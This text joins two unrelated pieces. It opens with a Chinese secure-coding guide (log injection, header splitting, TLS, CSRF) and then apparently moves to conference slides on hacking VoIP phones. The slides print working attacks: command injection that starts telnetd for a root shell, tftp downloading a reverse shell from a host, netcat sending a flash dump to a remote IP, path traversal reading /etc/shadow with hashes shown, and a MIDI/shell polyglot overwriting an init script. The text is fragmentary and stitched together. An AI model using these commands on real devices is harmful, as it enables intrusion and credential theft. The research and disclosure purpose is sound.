日志注入攻击是将未经验证的用户输入写到日志文件中,可以允许攻击者伪造日志条目或将恶意内容注
入到日志中。
如果用户提交val的字符串"twenty-one",则会记录以下条目:
INFO: Failed to parse val=twenty-one
然而,如果攻击者提交包含换行符%0d和%0a的字符串”twenty-
one%0d%0aHACK:+User+logged+in%3dbadguy”,会记录以下条目:
INFO: Failed to parse val=twenty-one
HACK: User logged in=badguy
显然,攻击者可以使用相同的机制插入任意日志条目。所以所有写入日志的条目必须去除\r和\n字符。
脆弱代码:
public void risk(HttpServletRequest request, HttpServletResponse response) {
String val = request.getParameter("val");
try {
int value = Integer.parseInt(val);
out = response.getOutputStream();
}
catch (NumberFormatException e) {
e.printStackTrace(out);
log.info(""Failed to parse val = "" + val);
}
}
解决方案:
public void risk(HttpServletRequest request, HttpServletResponse response) {
String val = request.getParameter("val");
try {
int value = Integer.parseInt(val);
}
catch (NumberFormatException e) {
val = val.replace("\r", "");
val = val.replace("\n", "");
log.info(""Failed to parse val = "" + val);
//不要直接 printStackTrace 输出错误日志
}
}
HTTP响应截断
攻击者任意构造HTTP响应数据并传递给应用程序可以构造:缓存中毒(Cache Poisoning),跨站点脚
本(XSS) 和页面劫持(Page Hijacking)等攻击。
脆弱代码:
下面的代码段从HTTP请求中读取网络日志条目的作者姓名,并将其设置为HTTP响应的cookie头。
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);
假设一个由标准的字母数字字符组成的字符串如"Jane Smith",在请求中提交包括cookie在内的HTTP响
应可能采用以下形式:
HTTP/1.1 200 OK
Set-Cookie: author=Jane Smith
但是,由于cookie的值由未验证的用户输入构成的,如果攻击者提交恶意字符串,例如“Wiley Hacker
\r\n Content-Length:999 \r\n \r\n”,那么HTTP响应将被分割成伪造的响应,导致原始响应被忽略掉:
HTTP/1.1 200 OK
Set-Cookie: author=Wiley Hacker
Content-Length: 999
malicious content... (to 999th character in this example)
Original content starting with character 1000, which is now ignored by the web browser...
脆弱代码:
public void risk(HttpServletRequest request, HttpServletResponse response) {
String key = request.getParameter("key");
String value = request.getParameter("value");
response.setHeader(key, value);
}
解决方案1:
public void fix(HttpServletRequest request, HttpServletResponse response) {
String key = request.getParameter("key");
String value = request.getParameter("value");
key = key.replace("\r", "");
key = key.replace("\n", "");
value = value.replace("\r", "");
value = value.replace("\n", "");
response.setHeader(key, value);
}
解决方案2:
public void fix(HttpServletRequest request, HttpServletResponse response) {
String key = request.getParameter("key");
String value = request.getParameter("value");
if (Pattern.matches("[0-9A-Za-z]+", key) && Pattern.matches("[0-9A-Za-z]+", value)) {
response.setHeader(key, value);
}
}
修复建议
在操作HTTP响应报头(即Head部分)时,所有写入该区域的值必须去除\r和\n字符。
创建一份安全字符白名单,只接受白名单限制内的输入数据出现在HTTP响应头中,例如只允许字
母和数字。
第十八条 禁止高风险的服务及协议
禁止使用不加保护或已被证明存在安全漏洞的服务和通信
协议传输数据及文件。
编码类要求:
DefaultHttpClient与TLS 1.2不兼容
HostnameVerifier 由于许多主机上都重复使用了证书,因此经常使用接受任何主机的请求。这很容
易受到中间人攻击,因为客户端将信任任何证书。
应升级jdk版本到1.8最新版,并使用-Dhttps.protocols=TLSv1.2启动java进程,使用HTTPS时采用
TLS1.2是等级保护三级的要求
脆弱代码:
// 默认的DefaultHttpClient兼容不兼容tls1.2
HttpClient client = new DefaultHttpClient();
// 更不能使用存在缺陷的ssl
SSLContext.getInstance("SSL");
解决方案:
通过指定HttpClient的协议版本为tls1.2,以禁止使用ssl、tls1.1及以下的版本。
CloseableHttpClient client = HttpClientBuilder.create()
.setSSLSocketFactory(new SSLConnectionSocketFactory(SSLContext.getDefault(),
new String[] { "TLSv1.2" }, null, SSLConnectionSocketFactory.getDefaultHostnameVerifier()))
.build();
不安全的HTTP动词
RequestMapping默认情况下映射到所有HTTP动词,电力行业强制要求只能使用GET和POST,应使用
GetMapping和PostMapping进行限制。
脆弱代码:
@Controller
public class UnsafeController {
// RequestMapping 默认情况下映射到所有HTTP动词
@RequestMapping("/path")
public void writeData() {
[...]
}
}
解决方案:
@Controller
public class SafeController {
// 只接受GET动词,不执行数据修改操作
@GetMapping("/path")
public String readData() {
return "";
}
// 只接受POST动词,执行数据修改操作
@PostMapping("/path")
public void writeData() {
[...]
}
}
以上代码基于Spring Framework 4.3及更高版本
第十九条 避免异常信息泄漏
去除与程序无关的调试语句;对返回客户端的提示信息进
行统一格式化,禁止用户ID、网络、应用程序以及服务器
环境的细节等重要敏感信息的泄漏。
编码类要求:
意外的属性泄露
系统应限制返回用户侧的字段数据,保证敏感字段内容不泄露。
脆弱代码:
@javax.persistence.Entity
class UserEntity {
@Id
@GeneratedValue(strategy = GenerationType.IDENTITY)
private Long id;
private String username;
private String password;
}
@Controller
class UserController {
@PostMapping("/user/{id}")
public UserEntity getUser(@PathVariable("id") String id) {
//返回用户所有字段内容,可能包括敏感字段
return userService.findById(id).get();
}
}
解决方案1:
@Controller
class UserController {
//禁止在url中使用业务变量,以防止篡改导致的越权
@PostMapping("/user")
public UserEntity getUser(@RequestParam("id") String id) {
//返回用户所有字段内容,可能包括敏感字段
return userService.findById(id).get();
}
}
@Controller
class UserController {
@InitBinder
public void initBinder(WebDataBinder binder, WebRequest request){
//限制返回给用户的字段
binder.setAllowedFields(["username","firstname","lastname"]);
}
}
解决方案2:
@Controller
class UserController {
//禁止在url中使用业务变量,以防止篡改导致的越权
@PostMapping("/user")
public UserEntity getUser(@RequestParam("id") String id) {
//返回用户所有字段内容,可能包括敏感字段
return userService.findById(id).get();
}
}
class UserEntity {
@Id
private Long id;
private String username;
// 如果使用jackson,可以使用@JsonIgnore禁止某字段参加格式化
// 在某字段的get方法上使用@JsonIgnore对应禁止序列化,在set方法方法上使用@JsonIgnore对应禁止反序列化
// 或者使用@JsonIgnoreProperties(value = "{password}")禁止某字段参与格式化
@JsonIgnore
private String password;
}
不安全的 SpringBoot Actuator 暴露
SpringBoot Actuator 如果不进行任何安全限制直接对外暴露访问接口,可导致敏感信息泄露甚至恶意命
令执行。
解决方案:
// 参考版本 springboot 2.3.2
// pom.xml 配置参考
<!-- 引入 actuator -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<!-- 引入 spring security -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
// application.properties 配置参考
#路径映射
management.endpoints.web.base-path=/lhdmon
#允许访问的ip列表
management.access.iplist = 127.0.0.1,192.168.1.100,192.168.2.3/24,192.168.1.6
#指定端口
#management.server.port=8081
#关闭默认打开的endpoint
management.endpoints.enabled-by-default=false
#需要访问的endpoint在这里打开
management.endpoint.info.enabled=true
management.endpoint.health.enabled=true
management.endpoint.env.enabled=true
management.endpoint.metrics.enabled=true
management.endpoint.mappings.enabled=true
#sessions需要spring-session包的支持
#management.endpoint.sessions.enabled=true
#允许查询所有列出的endpoint
management.endpoints.web.exposure.include=info,health,env,metrics,mappings
#显示所有健康状态
management.endpoint.health.show-details=always
不安全的 Swagger 暴露
Swagger 如果不进行任何安全限制直接对外暴露端访问路径,可导致敏感接口以及接口的参数泄露。
解决方案:
// 测试环境配置文件 application.properties 中
swagger.enable=true
// 生产环境配置文件 application.properties 中
swagger.enable=false
// java代码中变量 swaggerEnable 通过读取配置文件设置swagger开关
@Configuration
public class Swagger {
@Value("${swagger.enable}")
private boolean swaggerEnable;
@Bean
public Docket createRestApi() {
return new Docket(DocumentationType.SWAGGER_2)
// 变量 swaggerEnable 控制是否开启 swagger
.enable(swaggerEnable)
.apiInfo(apiInfo())
.select()
.apis(RequestHandlerSelectors.basePackage("com.tao.springboot.action"))
//controller路径
.paths(PathSelectors.any())
.build();
}
第二十条 严格会话管理
应用程序中应通过限制会话的最大空闲时间及最大持续时
间来增加应用程序的安全性和稳定性,并保证会话的序列
号长度不低于64位。
编码类要求:
缺少HttpOnly标志的Cookie
电力系统强制要求cookie开启HttpOnly以保护用户鉴权。
脆弱代码:
Cookie cookie = new Cookie("email",userName);
response.addCookie(cookie);
解决方案:
Cookie cookie = new Cookie("email",userName);
cookie.setSecure(true);
cookie.setHttpOnly(true); //开启HttpOnly
缺少Spring CSRF保护
禁用Spring Security的CSRF保护对于标准Web应用程序是不安全的。
脆弱代码:
@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
@Override
protected void configure(HttpSecurity http) throws Exception {
http.csrf().disable();
}
}
不安全的CORS策略
所有对外的url请求原则上需要使用白名单限制。
脆弱代码:
response.addHeader("Access-Control-Allow-Origin", "*");
解决方案:
Access-Control-Allow-Origin 字段的值应依照部署情况进行白名单限制。
不安全的永久性Cookie
脆弱代码:
Cookie cookie = new Cookie("email", email);
cookie.setMaxAge(60*60*24*365); // 设置一年的cookie有效期
解决方案:
电力系统禁止使用永久性Cookie,并限制其最长使用期限为30分钟。
电力系统要求登录前、登录后、退出后三个状态下的cookie不能一致。
不安全的广播(Android)
在未指定广播者权限的情况下注册的接收者将接收来自任何广播者的消息。如果这些消息包含恶意数据
或来自恶意广播者,可能会对应用程序造成危害。电力系统禁止app应用无条件接受广播。
脆弱代码:
Intent i = new Intent();
i.setAction("com.insecure.action.UserConnected");
i.putExtra("username", user);
i.putExtra("email", email);
i.putExtra("session", newSessionId);
this.sendBroadcast(v1);
解决方案:
配置(接收器)
<manifest>
<!-- 权限宣告 -->
<permission android:name="my.app.PERMISSION" />
<receiver
android:name="my.app.BroadcastReceiver"
android:permission="my.app.PERMISSION"> <!-- 权限执行 -->
<intent-filter>
<action android:name="com.secure.action.UserConnected" />
</intent-filter>
</receiver>
</manifest>
配置(发送方)
<manifest>
<!-- 声明拥有上述接收器发送广播的许可 -->
<uses-permission android:name="my.app.PERMISSION"/>
<!-- 使用以下配置,发送方和接收方应用程序都需要由同一个开发人员证书签名 -->
<permission android:name="my.app.PERMISSION" android:protectionLevel="signature"/>
</manifest>
或者禁止响应一切外部广播
<manifest>
<!-- 权限宣告 -->
<permission android:name="my.app.PERMISSION" android:exported="false" />
<receiver
android:name="my.app.BroadcastReceiver"
android:permission="my.app.PERMISSION">
<intent-filter>
<action android:name="com.secure.action.UserConnected" />
</intent-filter>
</receiver>
</manifest> | pdf |
I‘m on Your Phone, Listening –
Attacking VoIP Configuration
Interfaces
Stephan Huber | Fraunhofer SIT, Germany
Philipp Roskosch | Fraunhofer SIT, Germany
About us
Stephan
Security Researcher @Testlab
Mobile Security (Fraunhofer SIT)
Code Analysis Tool development
IOT Stuff
Founder of @TeamSIK
2
About us
Philipp
Security Researcher & Pentester
@Secure Software Engineering
(Fraunhofer SIT)
Static Code Analysis
IoT Vuln Detection Research
Day 1 Member of @TeamSIK
3
TODO
4
Alexander Traud
Acknowledgements
Beer Announcement
5
Past Projects
6
Def Con 26: Tracker Apps
DeF Con 25: Password Manager Apps
Def Con 24: Anti Virus Apps
Blackhat EU 2015: BAAS Security
https://team-sik.org
What’s next?
7
Wide distribution
Complex software
Readily accessible
The Target Devices
8
Perfect World
9
Internet
Guest Network
Workstation Network
VoIP Phone Network
Real World
10
Internet
Network
VoIP Phones
Guests
Workstations
Publicly reachable!
Agenda
11
Background
IoT Hacking 101
Findings
DOS, Weak Crypto, XSS, CSRF
Command Injection
Authentication Bypass
Memory Corruption
Recommendations
Responsible disc. experiences
Summary
12
Background
Architecture and Attack Targets
ARM/
MIPS
F
L
A
S
H
Linux OS
Kernel
Bootloader
13
Architecture and Attack Targets
ARM/
MIPS
F
L
A
S
H
Linux OS
Kernel
init
uid:0
watchdog uid:0
sipd
uid:0
•
loads kernel modules/drivers
•
spawn webserver
•
launch scripts
•
command interface
•
…
(web)server uid:0
Bootloader
•
basic setup
•
starts daemons
•
…
•
checks if daemons run
•
…
14
Architecture and Attack Targets
ARM/
MIPS
F
L
A
S
H
Linux OS
Kernel
init
uid:0
watchdog uid:0
sipd
uid:0
•
loads kernel modules/drivers
•
spawn webserver
•
launch scripts
•
command interface
•
…
(web)server uid:0
Bootloader
•
basic setup
•
starts daemons
•
…
•
checks if daemons run
•
…
15
16
Methodology
Abstract Methodology
17
Webserver is
Running
Web Pentesting
Static Analysis
Dynamic Analysis
Setup VoIP Phone
Attach HTTP Proxy
Extract Firmware
Emulation
Abstract Methodology
18
Inject dynamic analysis tools
Webserver is
Running
Web Pentesting
Static Analysis
Dynamic Analysis
Setup VoIP Phone
Attach HTTP Proxy
Extract Firmware
Emulation
Toolchain
19
ZAP, Burp Suite
IDA Pro, Ghidra
binwalk, yara
gdb, gdbserver, strace
ropper, IDA rop Plugin
mutiny, boofuzz, …
qemu
Webserver is
Running
Web Pentesting
Static Analysis
Dynamic Analysis
Setup VoIP Phone
Attach HTTP Proxy
Extract Firmware
Emulation
20
Firmware Access
Firmware Access for Software People
Out of scope is desoldering of chips and complex hardware setup
and probes
https://blog.quarkslab.com/flash-dumping-part-i.html
21
https://hackaday.com/wp-content/uploads/2017/01/dash-mitm.png
Firmware Access for Software People
Download the firmware from
vendor/manufacturer
Get image from update traffic
Get image or files from the device
22
•
Only updates, diffs or patches available
•
Encrypted images
•
No update server, only manual
HW for Software People we used
JTAGulator* by Joe Grand (presented at DC 21)
Find JTAG and UART interfaces
UART pass through (flexible voltage)
Bus Pirate
UART, SPI, JTAG debugging
mArt UART adapter**
Raspberry Pi
…
* http://www.grandideastudio.com/jtagulator/
** https://uart-adapter.com/
23
Examples: SPI
Bus
Pirate
Flash Chip
Description
CS #1
CS
Chip Select
MISO #2
DO (IO1)
Master In, Slave Out
3V3 #3
WP (IO2)
Write Protect
GND #4
GND
Ground
MOSI #5
DI (IO0)
Master Out, Slave In
CLK #6
CLK
SPI Clock
3V3 #7
HOLD (IO3)
Hold
3V3 #8
VCC
Supply
Find Datasheet
Winbond W25Q64JV
Chip on Device
Connect Bus Pirate
24
Connected
Akuvox R50 VoIP Phone with Bus Pirate connected
25
Dump it
Flashrom* chip detection:
Flashrom dump:
File extraction :
Multiple dumps, output variation:
$ flashrom -p buspirate_spi:dev=/dev/ttyUSB0
* https://github.com/flashrom/flashrom
$ flashrom -p buspirate_spi:dev=/dev/ttyUSB0 -c W25Q64.V -r firmw2.bin
$ binwalk -eM firmw.bin
Filename
MD5
firmw.bin
3840d51b37fe69e5ac7336fe0a312dd8
firmw2.bin
403ae93e72b1f16712dd25a7010647d6
26
Examples: UART
Fanvil X6 UART connection
27
Examples: Bootloader
UART bootloader via serial console (minicom, screen, putty, …) :
28
help
info
reboot
run [app addr] [entry addr]
r [addr]
w [addr] [val]
d [addr] <len>
resetcfg
…
Bootloader Menu:
Dump flash memory:
d 0x81000000 7700000
Examples: UART
UART root shell:
29
Use Vulnerability
Command injection starts telnet:
Root shell without authentication:
30
;busybox telnetd &#
Connected to 10.148.207.126.
Escape character is '^]'.
DSPG v1.2.4-rc2 OBiPhone
OBiPhone login: root
root@OBiPhone:~# id
uid=0(root) gid=0(root) groups=0(root)
Dump with Console
31
Tftp client part of busybox and/or used for firmware update
Simple tftpserver* required
Download - load file onto device:
tftp -g -r revshell 10.148.207.102 6969
Upload - get file from device:
tftp -p -r /dev/mtdblock0 10.148.207.102 6969
Netcat, if part of busybox pipe data to listener:
Listener, receiver of data:
nc –lp 4444 | tar x
Sender, data source:
busybox tar cf - /dev/mtdblock0 | busybox nc 10.148.207.227
Other clients, like wget, webform, scp, etc…
* https://github.com/sirMackk/py3tftp
32
Emulation
Emulation Approaches
CPU emulation (e.g. Unicorn)
User mode emulation
System mode emulation (third party OS)
System mode emulation with original file system
System mode emulation including original kernel modules
Full system emulation (including unknown peripherals and
interfaces)
33
Emulation Approaches
CPU emulation (e.g. Unicorn)
User mode emulation
System mode emulation (third party OS)
System mode emulation with original file system
System mode emulation including original kernel modules
Full system emulation (including unknown peripherals and
interfaces)
34
Firmware Emulation
Emulator (QEMU ARM/MIPS)
Kernel
Linux FS
35
Firmware Emulation
UI
API
Process
Firmware FS
Emulator (QEMU ARM/MIPS)
Kernel
chroot environment
Linux FS
36
Firmware Emulation
UI
API
Process
Firmware FS
Emulator (QEMU ARM/MIPS)
Kernel
chroot environment
gdb
strace
Analyzing Tools
Linux FS
dynamic hooks
Value spoofing/runtime patching:
•
Hook function
•
Modify runtime values
•
Memory dumps
•
…
37
Example gdb Patch Script
38
gdb script:
#enable non stop mode
set target-async on
set non-stop off
#attach
target remote localhost:2345
#change fork mode
set follow-fork-mode parent
show follow-fork-mode
#first continue
c
#first breakpoint at printf b1
br *0x1a1bc
#3rd continue ssl armv7probe
c
…
#change sighandler (11 segfault)
set $r0=8
# continue for break1a
c
…
gdb mode change
“Automatic” continue or break
Change values at runtime
39
Findings !
DoS
40
Multiple ways of DoSing VoIP phones!
Limited CPU/ memory resources
Parsing problems
Bad TCP/IP Stack implementation
Memory corruptions, usage of “bad C” functions
…
DoS – Super Simple I
41
Extensive nmap scan is too much for Mitel 6865i
nmap -p 1-65535 -T4 -A my.voip.phone
DoS – Assert Instruction
43
Cisco IP Phone 7821
curl 'http://10.148.207.42/basic"/init.json' -H …
DoS – Assert Instruction
44
Cisco IP Phone 7821
curl 'http://10.148.207.42/basic"/init.json' -H …
DoS – Assert Instruction
45
Cisco IP Phone 7821
curl 'http://10.148.207.42/basic"/init.json' -H …
[..]
voice-http:app_get:"/ init.json
spr_voip: src/http_get_pal.c:374: http_gen_json: Assertion `core_uri[0] == '/'' failed.
[..]
restart_mgr-connection 18 from spr_voip closed
restart_mgr-processing kill-list for spr_voip
restart_mgr-killing ms
[..]
DoS – CVE-2017-3731 – OpenSSL
46
Web interface provides login via https:// OpenSSL
Malformed packet causes out-of-bounds read
OpenSSL Version 1.0.2 and 1.1.0
Results in different behavior
Fanvil X1P, Firmware 2.10.0.6586, Phone reboots
Mitel, Firmware 5.1.0.1024, Phone reboots
ALE, Firmware 1.30.20, Webserver crashes
Samsung, Firmware 01.62, Webserver restarts
Bad crypto stuff
47
Bad Crypto Stuff !
Bad Crypto
48
Config File Export in Akuvox R50
Credentials are encrypted ?
[ LOGIN ]
User =admin
Password =D/6SxcRQwsgPwVwdfIiQhg+zh8fqlvfBkNY29aSkxw+CwqItFbeLaPG7tx0D
[ WEB_LOGIN ] User =admin
Password =xzahQYJBxcgPwVwdfJVoYTfCwiyaoosyF5BAHQ8zleoVwcdBKPXCx0aQxIaJ
Type =admin
User02 =user
Password02 =8cFhHfcPCJIzUP58xJpGNsHHu1C3xAjHt4ReQmFA91DqF0Ayw4c3QEbFhDIo
Bad Crypto
49
Config File Export in Akuvox R50
Credentials are encrypted, for real
$ echo -n "xzahQYJBxcgPwVwdfJVoYTfCwiyaoosyF5BAHQ8zleoVwcdBKPXCx0aQxIaJ"
| base64 -d | xxd
00000000: c736 a141 8241 c5c8 0fc1 5c1d 7c95 6861 .6.A.A....\.|.ha
00000010: 37c2 c22c 9aa2 8b32 1790 401d 0f33 95ea 7..,[email protected]..
00000020: 15c1 c741 28f5 c2c7 4690 c486 89 ...A(...F....
Bad Crypto
50
FW Extraction -> Binary investigation
int phone_aes_decrypt(char *key, char *decoded_str, int size, char *result) {
}
Bad Crypto
51
FW Extraction -> Binary investigation
int phone_aes_decrypt(char *key, char *decoded_str, int size, char *result) {
}
Bad Crypto
52
FW Extraction -> Binary investigation
int phone_aes_decrypt(char *key, char *decoded_str, int size, char *result) {
int i;
int j;
int k;
unsigned char tmp;
if ( !key || !decoded_str || !result || !size )
return -1;
for (i = 0; i < size; i++) {
decoded_str[i] = box_decr[(int)result[i]];
}
for (j = 0; *key % size > j; j++) {
printf("j=%d\n",j);
tmp = *decoded_str;
for (k = 0; k < size - 1; k++) {
decoded_str[k] = decoded_str[k + 1];
}
decoded_str[size - 1] = tmp;
}
return 0;
}
Self-implemented
Simple substitution, NO AES
Bad Crypto
53
FW Extraction -> Binary investigation
int phone_aes_decrypt(char *key, char *decoded_str, int size, char *result) {
int i;
int j;
int k;
unsigned char tmp;
if ( !key || !decoded_str || !result || !size )
return -1;
for (i = 0; i < size; i++) {
decoded_str[i] = box_decr[(int)result[i]];
}
for (j = 0; *key % size > j; j++) {
printf("j=%d\n",j);
tmp = *decoded_str;
for (k = 0; k < size - 1; k++) {
decoded_str[k] = decoded_str[k + 1];
}
decoded_str[size - 1] = tmp;
}
return 0;
}
Self-implemented
Simple substitution
Hardcoded Key in FW
“akuvox“
54
WEB ATTACKS
AudioCodes 405HD
My favorite contact name: <script>alert("Xss");</script>
Web Based Findings – XSS
55
AudioCodes 405HD
My favorite contact name: <script>alert("Xss");</script>
Web Based Findings – XSS
56
Web Based Findings – Gigaset Maxwell Basic
58
Information leak
Using the
Web-Interface
Traffic Analysis
Web Based Findings – Gigaset Maxwell Basic
59
GET http://gigaset.voip/Parameters
Using the
Web-Interface
Traffic Analysis
return getCodeMess('session', 'admlog');
return getCodeMess('session', 'admerr');
Information leak
Web Based Findings – Gigaset Maxwell Basic
60
GET http://gigaset.voip/Parameters
Admin logged in?
Yes
No
Using the
Web-Interface
Traffic Analysis
return getCodeMess('session', 'admlog');
return getCodeMess('session', 'admerr');
Information leak
Information leak
Web Based Findings – Gigaset Maxwell Basic
61
Admin logged in?
Yes
No
Using the
Web-Interface
Traffic Analysis
¯\_(ツ)_/¯
Not that bad, right ?
Web Based Findings – Gigaset Maxwell Basic
62
function sessInfo()
{
$token = GetSessionToken();
$session = new sessionmanager();
if ($session->getCurrentLoginUser() == USER_ADMIN
&& $token != $session->getToken())
{
return getCodeMess('session', 'admlog');
}
else
{
return getCodeMess('session', 'sesserr');
}
}
Web Based Findings – Gigaset Maxwell Basic
63
Admin
Logging in
Generate Session Token
Session Token
DB
Web Based Findings – Gigaset Maxwell Basic
64
Logging in
Generate Session Token
Session Token
DB
Send invalid
Session Token
Admin
Web Based Findings – Gigaset Maxwell Basic
65
Logging in
Generate Session Token
Session Token
DB
Send invalid
Session Token
if ($session->getCurrentLoginUser() == USER_ADMIN
&& $token != $session->getToken())
Admin
Digging deeper
Web Based Findings – Gigaset Maxwell Basic
66
Firmware
Extraction
php file
investigation
function POST_State()
{
$session = new sessionmanager;
$token = GetSessionToken();
$userID = $session->verifySession($token);
if ($userID)
{
// Do Something here
}
}
Digging deeper
Web Based Findings – Gigaset Maxwell Basic
67
Firmware
Extraction
php file
investigation
Digging deeper
Web Based Findings – Gigaset Maxwell Basic
68
Firmware
Extraction
php file
investigation
function POST_State()
{
$session = new sessionmanager;
$token = GetSessionToken();
$userID = $session->verifySession($token);
if ($userID)
{
// Do Something here
}
}
Digging deeper
Web Based Findings – Gigaset Maxwell Basic
69
Firmware
Extraction
php file
investigation
function POST_State()
{
$session = new sessionmanager;
$token = GetSessionToken();
$userID = $session->verifySession($token);
if ($userID)
{
// Do Something here
}
}
Digging even deeper
Web Based Findings – Gigaset Maxwell Basic
70
Firmware
Extraction
php file
investigation
function POST_Parameters()
{
$session = new sessionmanager;
$token = GetSessionToken();
$userID = $session->verifySession($token);
$nvm = new settingscontroller();
$req = array();
$reqarr = json_decode(file_get_contents('php://input'));
foreach ($reqarr as $key => $value)
{
$req[$key] = $value;
}
$nvm->settingsCheckAccessParams($req);
if ($nvm->settingsSaveMultiValue($req) == true)
{
Digging even deeper
Web Based Findings – Gigaset Maxwell Basic
71
Firmware
Extraction
php file
investigation
function POST_Parameters()
{
$session = new sessionmanager;
$token = GetSessionToken();
$userID = $session->verifySession($token);
$nvm = new settingscontroller();
$req = array();
$reqarr = json_decode(file_get_contents('php://input'));
foreach ($reqarr as $key => $value)
{
$req[$key] = $value;
}
$nvm->settingsCheckAccessParams($req);
if ($nvm->settingsSaveMultiValue($req) == true)
{
Digging even deeper
Web Based Findings – Gigaset Maxwell Basic
72
Firmware
Extraction
php file
investigation
Returns 0 as attacker does not know current
session token
function POST_Parameters()
{
$session = new sessionmanager;
$token = GetSessionToken();
$userID = $session->verifySession($token);
$nvm = new settingscontroller();
$req = array();
$reqarr = json_decode(file_get_contents('php://input'));
foreach ($reqarr as $key => $value)
{
$req[$key] = $value;
}
$nvm->settingsCheckAccessParams($req);
if ($nvm->settingsSaveMultiValue($req) == true)
{
Digging even deeper
Web Based Findings – Gigaset Maxwell Basic
73
Firmware
Extraction
php file
investigation
Returns 0 as attacker does not know current
session token
Change it anyway
Demo
74
Demo Time
Path Traversal
75
GET http://voip.phone/cmd.bin?file=defcon.txt
Send content of: defcon.txt
Path Traversal
76
GET http://voip.phone/cmd.bin?file=defcon.txt
Send content of: defcon.txt
GET http://voip.phone/cmd.bin?file=
../../../../../etc/passwd
Send content of: ../../../../../etc/passwd
Send content of: /etc/passwd
Path Traversal - Yealink T41S
77
POST http://10.148.207.216/servlet?m=mod_data&p=network-diagnosis
&q=getinfo&Rajax=0.5174477889842097 HTTP/1.1
Proxy-Connection: keep-alive
Content-Length: 53
Origin: http://10.148.207.216
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/64.0.3282.24 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://10.148.207.216/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Language: en-gb
Cookie: JSESSIONID=3b73d6390697f50
Host: 10.148.207.216
file=../../../../../../../etc/shadow&token=42423833540d4e990
Path Traversal - Yealink T41S
78
Response:
<html>
<body>
<div id="_RES_INFO_">
root:$1$.jKlhz1B$/Nmgj2klrsZk3cYc1BLUR/:11876:0:99999:7:::
toor:$1$5sa7xxqo$eV4t7Nb1tPqjOWT1s3/ks1:11876:0:99999:7:::
</div>
</body>
</html>
Instead of network diagnostics: /etc/shadow
Ringtone Code Injection
79
Ringtone file upload provides an attack surface for uploading “code” to
execute
Path traversal vulnerability would allow to write to arbitrary folder and
overwrite a privileged script
Problem, script is not an audio file, how to bypass content verification ?
Filename: ../../../etc/init.d/OperaEnv.sh
Ringtone Code Injection
80
Ringtone file upload provides an attack surface for uploading “code” to
execute
Path traversal vulnerability would allow to write to arbitrary folder and
overwrite a privileged script
Problem, script is not an audio file, how to bypass content verification ?
Filename: ../../../etc/init.d/OperaEnv.sh
Ringtone Code Injection
81
Software verifies file, but only header
Ringtone Code Injection
82
Software verifies file, but only header
MThd..........MTrk...3...
...2009.11.01...
[email protected].!......Q....../.
#!/bin/sh
echo "New Script for changing password!"
echo "Sourcing Opera Environment...“
…
MIDI file header
each line „invalid command“
script code
Ringtone Code Injection
83
Software verifies file, but only header
Whole file will be interpreted as script, after passing header
verification!
MThd..........MTrk...3...
...2009.11.01...
[email protected].!......Q....../.
#!/bin/sh
echo "New Script for changing password!"
echo "Sourcing Opera Environment...“
…
MIDI file header
each line „invalid command“
script code
84
Backdoor ?!
Running Services
85
Portscan of Akuvox device:
Starting Nmap 7.01 ( https://nmap.org ) at 2019-07-26 11:20 CEST
Initiating Ping Scan at 11:20Scanning 10.148.207.221 [2 ports]
...
Host is up (0.014s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
23/tcp
open telnet
80/tcp
open http
443/tcp open https
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.00 seconds
huber@pc-huberlap:~$
Telnet running
Problem!
86
The running telnet service can not be turned off !
The firmware image is not public available,
Problem!
87
The running telnet service can not be turned off !
The firmware image is not public available, but we dumped it
Hashes are DES crypt protected max pass length = 8
On my old GPU it took around 30 days to crack it
huber@pc-huber:/akuvox/squashfs-root/etc$ cat shadow
root:pVjvZpycBR0mI:10957:0:99999:7:::
admin:UCX0aARNR9jK6:10957:0:99999:7:::
88
Command INjection
Command Injection
89
IP:
x
Web Interface
Ping
Command Injection
90
…
sprintf(buffer, "ping %s -c 4", ip);
system(buffer);
…
POST:
Ip=127.0.0.1
IP:
x
Web Interface
Ping
127.0.0.1
Webserver
•
Server app
•
CGI script
…
127.0.0.1
Command Injection
91
…
sprintf(buffer, "ping %s -c 4", ip);
system(buffer);
…
POST:
Ip=127.0.0.1
system("ping 127.0.0.1 –c 4");
// do four pings
IP:
x
Web Interface
Ping
127.0.0.1
Webserver
•
Server app
•
CGI script
…
127.0.0.1
Command Injection
92
IP:
x
Web Interface
Ping
127.0.0.1 –c 0; ls ;#
127.0.0.1 –c 0; ls ;#
ping counter
exec ls
start comment
Command Injection
93
…
sprintf(buffer, "ping %s -c 4", ip);
system(buffer);
…
POST:
Ip=127.0.0.1 –c 0; ls ;#
IP:
x
Web Interface
Ping
127.0.0.1 –c 0; ls ;#
Webserver
•
Server app
•
CGI script
…
127.0.0.1 –c 0; ls ;#
127.0.0.1 –c 0; ls ;#
ping counter
exec ls
start comment
Command Injection
94
…
sprintf(buffer, "ping %s -c 4", ip);
system(buffer);
…
POST:
Ip=127.0.0.1 –c 0; ls ;#
system("ping 127.0.0.1 –c 0; ls ;# –c 4");
// do zero ping, exec ls command, comment
IP:
x
Web Interface
Ping
127.0.0.1 –c 0; ls ;#
Webserver
•
Server app
•
CGI script
…
127.0.0.1 –c 0; ls ;#
127.0.0.1 –c 0; ls ;#
ping counter
exec ls
start comment
Command Injection
95
Command injection in AudioCodes 405HD device:
curl -i -s -k -X 'GET' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) …
-H 'Accept: */*' -H 'Accept-Language: en-GB,en;q=0.5'
-H 'Referer: http://10.148.207.249/mainform.cgi/Monitoring.htm'
-H 'Authorization: Basic YWRtaW46c3VwZXJwYXNz' –H 'Connection: keep-alive' -H '' \
'http://10.148.207.249/command.cgi?ping%20-c%204%20127.0.0.1;/usr/sbin/telnetd'
idea, start telnetd
Command Injection
96
Command injection in AudioCodes 405HD device:
curl -i -s -k -X 'GET' \
